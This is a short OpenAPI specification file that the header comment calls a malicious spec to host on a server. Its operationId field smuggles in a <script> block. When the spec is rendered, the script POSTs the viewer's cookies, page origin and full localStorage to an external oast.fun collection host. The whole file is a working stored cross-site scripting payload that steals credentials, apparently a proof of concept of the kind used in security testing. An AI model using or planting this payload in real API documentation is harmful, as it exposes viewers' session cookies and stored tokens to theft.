# Host this on your server as malicious-spec.yaml
openapi: 3.0.0
info:
  title: API Documentation
  version: 1.0.0
paths:
  /users:
    get:
      operationId: |
        legitimate_id<script>
        fetch('https://sxsqrhfknbmbrzsrhkhmeng8nou5pc8db.oast.fun/', {
          method: 'POST',
          mode: 'no-cors',
          body: JSON.stringify({
            cookies: document.cookie,
            origin: window.location.origin,
            localStorage: JSON.stringify(localStorage)
          })
        })
        </script>
      responses:
        '200':
          description: Success
